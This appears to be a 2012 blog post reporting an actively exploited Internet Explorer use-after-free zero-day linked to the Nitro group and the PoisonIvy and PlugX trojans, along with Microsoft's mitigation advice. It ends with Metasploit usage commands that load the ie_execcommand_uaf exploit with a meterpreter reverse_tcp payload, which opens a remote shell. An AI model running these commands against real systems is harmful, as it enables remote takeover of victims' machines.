Microsoft
has confirmed reports that a zero-day vulnerability in its Internet
Explorer browser is being actively attacked in the wild. Four active
exploits of a zero-day vulnerability in the browser exists. Microsoft
will push out an out-of-cycle Windows patch to temporarily fix the
critical Internet Explorer flaw.
Security
researcher Eric Romang identified the exploit code on a server used by
the "Nitro" hacking group, believed to have exploited the Java zero-day
vulnerability reported last month. Security firm Rapid7 advises that
Internet users try a different Web browser. The malware may be linked to
an ongoing attack on companies that has been dubbed “Nitro”, and was
first discovered in October by Symantec.
The zero-day in IE 6-9 is a use-after-free memory corruption vulnerability,
similar to a buffer overflow, that would enable an attacker to remotely
execute code on a compromised machine. The original exploit payload
dropped the PoisonIvy remote access Trojan (RAT) via a corrupted Flash
movie file. The latest payload discovered dropped the PlugX RAT via the same corrupted Flash movie.
This type of
attack is typically begun with a phishing email, or by tricking users
into clicking links in social media. The security advisory notes that
mainstream websites that have ads placed on the site via third-party ad
servers could also be vulnerable if the ad servers are compromised. In
other words, any site could be used to take advantage of the IE
flaw.It’s a serious flaw.
Even,
The German government has started telling its citizens to switch to
other browsers. Microsoft has reported that most users are not affected
by the bug, and the number of attacks has been limited. In the company's
update about the bug, they suggest either deactivating ActiveX controls
or using their Enhanced Mitigation Experience Toolkit until a patch is released.
Metasploit also Release PoC for this ."This
module exploits a vulnerability found in Microsoft Internet Explorer
(MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted
in an unexpected manner, but the same memory is reused again later in
the CMshtmlEd::Exec() function, leading to a use-after-free condition.
Please note that this vulnerability has been exploited in the wild since
Sep 14 2012, and there is currently no official patch for it." Get Exploit Here,
Usage :
use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.178.33 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.33 exploit sysinfo getuid
No comments:
Post a Comment